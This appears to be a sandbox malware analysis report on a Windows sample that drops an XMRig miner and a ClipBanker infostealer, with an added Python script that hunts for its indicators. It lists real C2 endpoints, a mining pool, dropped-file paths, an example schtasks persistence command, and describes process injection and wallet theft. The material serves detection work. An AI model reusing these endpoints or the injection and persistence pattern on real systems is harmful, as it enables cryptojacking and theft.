                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph

Behavior Graph ID: 553228
Sample: 982d4ea5fee5b8e551d40cb0727...
Start date: 14/01/2022
Architecture: WINDOWS
Score: 100

Sample-level signatures: Sigma detected: Xmrig; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures

Process tree (numbers are the graph's node IDs; a process started by another is indented under it; per-node network contacts, dropped files and signatures follow the process name):

13 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
   signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
   18 AppLaunch.exe
      network: 95.143.179.185, ports 31334, 49775 (RHTEC-ASrh-tecIPBackboneDE, Russian Federation); 45.82.70.152, ports 49778, 49779, 7777 (ON-LINE-DATAServerlocation-NetherlandsDrontenNL, Netherlands)
      dropped: C:\Users\user\AppData\Local\Temp\sistem.exe (PE32); C:\Users\user\AppData\Local\...\Microsoft.exe (PE32+)
      signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets
      25 Microsoft.exe
         signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Writes to foreign memory regions
         35 conhost.exe
            dropped: C:\Users\user\AppData\...\services64.exe (PE32+)
            42 cmd.exe
               47 services64.exe
                  signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection)
                  56 conhost.exe
                     signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Injects a PE file into a foreign processes
                     59 explorer.exe
                        network: mine.bmpool.org, 157.90.156.89 (REDIRISRedIRISAutonomousSystemES, United States)
                        signatures: System process connects to network (likely due to code injection or exploit); Query firmware table information (likely to detect VMs)
                     63 cmd.exe
                        65 taskkill.exe
                        67 conhost.exe
               50 conhost.exe
            44 cmd.exe
               signatures: Uses schtasks.exe or at.exe to add and modify task schedules
               52 conhost.exe
               54 schtasks.exe
      28 sistem.exe
         signatures: Machine Learning detection for dropped file; Allocates memory in foreign processes; Injects a PE file into a foreign processes
         38 AppLaunch.exe
16 services64.exe
   signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Creates a thread in another existing process (thread injection)
   23 conhost.exe
      dropped: C:\Users\user\AppData\...\sihost64.exe (PE32+); C:\Users\user\AppData\Roaming\...\WR64.sys (PE32+)
      signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 2 other signatures
      30 sihost64.exe
         signatures: Creates a thread in another existing process (thread injection)
         40 conhost.exe
      32 explorer.exe
         network: mine.bmpool.org
         signatures: System process connects to network (likely due to code injection or exploit); Query firmware table information (likely to detect VMs)
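The process tree and network endpoints above are the raw material for a hunt. The following Python is an added example, not part of the Joe Sandbox report, that turns them into detection logic run over process-creation and network events. The indicators (C2 IP:port pairs, the mining pool, the dropped-file paths and the parent/child pairs) are taken from the graph; the event records, the AppLaunch.exe path and the schtasks command line are constructed assumptions made for the example.

```python
"""Hunt for the behaviour-graph pattern above in process and network telemetry.

Added example; not code from the Joe Sandbox report. Indicators come from the
graph, the sample events are CONSTRUCTED to mirror it.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass

# Remote endpoints contacted by the injected AppLaunch.exe (node 18).
C2_ENDPOINTS = {("95.143.179.185", 31334), ("45.82.70.152", 7777)}
# Pool contacted by the injected explorer.exe (nodes 32 and 59).
MINING_POOL = {"mine.bmpool.org", "157.90.156.89"}

# Dropped-file paths from the graph, with the drive/user prefix stripped.
DROPPED_PATHS = {
    r"\appdata\local\temp\sistem.exe",
    r"\appdata\local\temp\microsoft.exe",
    r"\appdata\local\temp\services64.exe",
    r"\appdata\roaming\microsoft\libs\sihost64.exe",
    r"\appdata\roaming\microsoft\libs\wr64.sys",
}

# Parent -> child pairs that appear in the graph but not on a clean host.
SUSPICIOUS_PARENT_CHILD = {
    ("conhost.exe", "explorer.exe"),
    ("conhost.exe", "sihost64.exe"),
    ("conhost.exe", "cmd.exe"),
    ("applaunch.exe", "microsoft.exe"),
    ("applaunch.exe", "sistem.exe"),
}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # full path of the new process
    parent_image: str   # full path of its parent
    cmdline: str = ""


@dataclass(frozen=True)
class NetEvent:
    pid: int
    image: str
    dst: str            # IP or hostname
    dport: int | None = None   # None when the port is not known


def _base(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _under_user_profile(text: str) -> bool:
    t = text.lower()
    return "\\appdata\\local\\temp\\" in t or "\\appdata\\roaming\\" in t


def score_process(ev: ProcEvent) -> list[str]:
    hits: list[str] = []
    pair = (_base(ev.parent_image), _base(ev.image))
    if pair in SUSPICIOUS_PARENT_CHILD:
        hits.append(f"abnormal parent/child {pair[0]} -> {pair[1]}")
    if any(ev.image.lower().endswith(p) for p in DROPPED_PATHS):
        hits.append(f"execution of dropped file {_base(ev.image)}")
    # The graph shows cmd.exe -> schtasks.exe after services64.exe was dropped
    # into %TEMP%; the "/create ... <profile path>" shape is an assumption.
    if (_base(ev.image) == "schtasks.exe" and "/create" in ev.cmdline.lower()
            and _under_user_profile(ev.cmdline)):
        hits.append("schtasks persistence pointing into the user profile")
    return hits


def score_network(ev: NetEvent) -> list[str]:
    hits: list[str] = []
    if ev.dport is not None and (ev.dst, ev.dport) in C2_ENDPOINTS:
        hits.append(f"known C2 endpoint {ev.dst}:{ev.dport}")
    if ev.dst in MINING_POOL:
        hits.append(f"mining pool contact {ev.dst}")
        # explorer.exe/conhost.exe talking to a pool is the injected miner.
        if _base(ev.image) in {"explorer.exe", "conhost.exe"}:
            hits.append(f"system process {_base(ev.image)} contacting a pool (injected miner)")
    return hits


def hunt(procs: list[ProcEvent], nets: list[NetEvent]) -> dict[int, list[str]]:
    findings: dict[int, list[str]] = defaultdict(list)
    for p in procs:
        findings[p.pid].extend(score_process(p))
    for n in nets:
        findings[n.pid].extend(score_network(n))
    return {pid: h for pid, h in findings.items() if h}


# Constructed sample telemetry modelled on the graph (pids reuse the node IDs).
_APPLAUNCH = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"  # assumed path
SAMPLE_PROC = [
    ProcEvent(18, _APPLAUNCH, r"C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe"),
    ProcEvent(25, r"C:\Users\user\AppData\Local\Temp\Microsoft.exe", _APPLAUNCH),
    ProcEvent(54, r"C:\Windows\System32\schtasks.exe", r"C:\Windows\System32\cmd.exe",
              r"schtasks /create /tn Updater /tr C:\Users\user\AppData\Local\Temp\services64.exe"),
    ProcEvent(59, r"C:\Windows\explorer.exe", r"C:\Windows\System32\conhost.exe"),
    ProcEvent(900, r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe"),  # benign logon
]
SAMPLE_NET = [
    NetEvent(18, _APPLAUNCH, "45.82.70.152", 7777),
    NetEvent(18, _APPLAUNCH, "95.143.179.185", 31334),
    NetEvent(59, r"C:\Windows\explorer.exe", "mine.bmpool.org"),
    NetEvent(900, r"C:\Windows\explorer.exe", "www.example.com", 443),
]

if __name__ == "__main__":
    for pid, hits in sorted(hunt(SAMPLE_PROC, SAMPLE_NET).items()):
        print(pid, "->", "; ".join(hits))
```

The benign explorer.exe (pid 900, started by userinit.exe and talking to an ordinary web host) produces no finding, while the conhost.exe-spawned explorer.exe that contacts the pool is flagged on both the parent/child pair and the network contact.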

                  Screenshots

                  Thumbnails


                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

Source | Detection | Scanner | Label | Link
982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe | 35% | Virustotal | - | Browse
982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe | 100% | Joe Sandbox ML | - | -

                  Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | 100% | Avira | HEUR/AGEN.1145980 | -
C:\Users\user\AppData\Local\Temp\Microsoft.exe | 100% | Avira | HEUR/AGEN.1145980 | -
C:\Users\user\AppData\Local\Temp\services64.exe | 100% | Avira | HEUR/AGEN.1145980 | -
C:\Users\user\AppData\Local\Temp\sistem.exe | 100% | Joe Sandbox ML | - | -
C:\Users\user\AppData\Local\Temp\Microsoft.exe | 53% | Virustotal | - | Browse
C:\Users\user\AppData\Local\Temp\services64.exe | 53% | Virustotal | - | Browse
C:\Users\user\AppData\Local\Temp\sistem.exe | 31% | Metadefender | - | Browse
C:\Users\user\AppData\Local\Temp\sistem.exe | 75% | ReversingLabs | Win32.Infostealer.ClipBanker | -
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | 3% | Metadefender | - | Browse
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | 5% | ReversingLabs | - | -

                  Unpacked PE Files

Source | Detection | Scanner | Label | Link | Download
19.2.services64.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1145980 | - | Download File
27.0.explorer.exe.140000000.10.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
10.0.Microsoft.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1145980 | - | Download File
28.0.explorer.exe.140000000.3.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
28.0.explorer.exe.140000000.7.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
28.0.explorer.exe.140000000.8.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
27.0.explorer.exe.140000000.11.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
19.0.services64.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1145980 | - | Download File
27.0.explorer.exe.140000000.6.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
27.0.explorer.exe.140000000.3.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
27.0.explorer.exe.140000000.7.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
27.0.explorer.exe.140000000.12.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
9.2.AppLaunch.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1124739 | - | Download File
8.2.sistem.exe.19a5e8.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | - | Download File
28.2.explorer.exe.140000000.0.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
28.0.explorer.exe.140000000.13.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
27.0.explorer.exe.140000000.13.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
28.0.explorer.exe.140000000.2.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
15.2.services64.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1145980 | - | Download File
28.0.explorer.exe.140000000.5.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
27.0.explorer.exe.140000000.2.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
27.2.explorer.exe.140000000.0.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
28.0.explorer.exe.140000000.9.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
27.0.explorer.exe.140000000.9.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
10.2.Microsoft.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1145980 | - | Download File
28.0.explorer.exe.140000000.0.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
27.0.explorer.exe.140000000.4.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
22.0.sihost64.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1145980 | - | Download File
27.0.explorer.exe.140000000.1.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
28.0.explorer.exe.140000000.1.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
28.0.explorer.exe.140000000.4.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
27.0.explorer.exe.140000000.5.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
27.0.explorer.exe.140000000.0.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
15.0.services64.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1145980 | - | Download File
28.0.explorer.exe.140000000.6.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
8.3.sistem.exe.2910000.0.unpack | 100% | Avira | HEUR/AGEN.1124739 | - | Download File
27.0.explorer.exe.140000000.8.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
28.0.explorer.exe.140000000.11.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
28.0.explorer.exe.140000000.10.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File
22.2.sihost64.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1145980 | - | Download File
28.0.explorer.exe.140000000.12.unpack | 100% | Avira | HEUR/AGEN.1134782 | - | Download File

                  Domains

                  No Antivirus matches

                  URLs

Source | Detection | Scanner | Label | Link
http://service.r | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id12Response | 0% | URL Reputation | safe | -
http://ns.ado/Identq | 0% | Avira URL Cloud | safe | -
http://tempuri.org/ | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id2Response | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id21Response | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id9 | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id8 | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id5 | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id4 | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id7 | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id6 | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id19Response | 0% | URL Reputation | safe | -
http://www.interoperabilitybridges.com/wmp-extension-for-chrome | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id15Response | 0% | URL Reputation | safe | -
http://support.a | 0% | URL Reputation | safe | -
http://iptc.tc4xmp | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id6Response | 0% | URL Reputation | safe | -
https://api.ip.sb/ip | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id9Response | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id20 | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id21 | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id22 | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id23 | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id24 | 0% | URL Reputation | safe | -
https://xmrig.com/wizard | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id24Response | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id1Response | 0% | URL Reputation | safe | -
http://forms.rea | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id10 | 0% | URL Reputation | safe | -
https://xmrig.com/benchmark/%s | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id11 | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id12 | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id16Response | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id13 | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id14 | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id15 | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id16 | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id17 | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id18 | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id5Response | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id19 | 0% | URL Reputation | safe | -
http://go.mic4m | 0% | Avira URL Cloud | safe | -
http://tempuri.org/Entity/Id10Response | 0% | URL Reputation | safe | -
http://tempuri.org/Entity/Id8Response | 0% | URL Reputation | safe | -

                  Domains and IPs

                  Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mine.bmpool.org | 157.90.156.89 | true | false | - | high

                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
https://duckduckgo.com/chrome_newtab | AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp | false | - | high
http://service.r | AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp | false | - | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://tempuri.org/Entity/Id12Response | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ns.ado/Identq | AppLaunch.exe, 00000001.00000002.733909521.0000000005687000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/ | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id2Response | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1 | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://tempuri.org/Entity/Id21Response | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://tempuri.org/Entity/Id9 | AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://tempuri.org/Entity/Id8 | AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id5 | AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://tempuri.org/Entity/Id4 | AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id7 | AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id6 | AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
https://support.google.com/chrome/?p=plugin_real | AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp | false | - | high
http://tempuri.org/Entity/Id19Response | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://www.interoperabilitybridges.com/wmp-extension-for-chrome | AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence | AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | - | high
https://support.google.com/chrome/?p=plugin_pdf | AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2004/10/wsat | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://tempuri.org/Entity/Id15Response | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, conhost.exe, 0000000B.00000002.747239669.000001B080001000.00000004.00000001.sdmp | false | - | high
http://forms.real.com/real/realone/download.html?type=rpsp_us | AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp | false | - | high
http://support.a | AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://iptc.tc4xmp | AppLaunch.exe, 00000001.00000002.733909521.0000000005687000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id6Response | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
https://api.ip.sb/ip | 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmp | false | URL Reputation: safe | unknown
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe | AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp | false | - | high
https://support.google.com/chrome/?p=plugin_quicktime | AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2004/04/sc | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://tempuri.org/Entity/Id9Response | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp | false | - | high
http://tempuri.org/Entity/Id20 | AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id21 | AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id22 | AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1 | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://tempuri.org/Entity/Id23 | AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1 | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
http://tempuri.org/Entity/Id24 | AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://xmrig.com/wizard | conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue | AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp | false | - | high
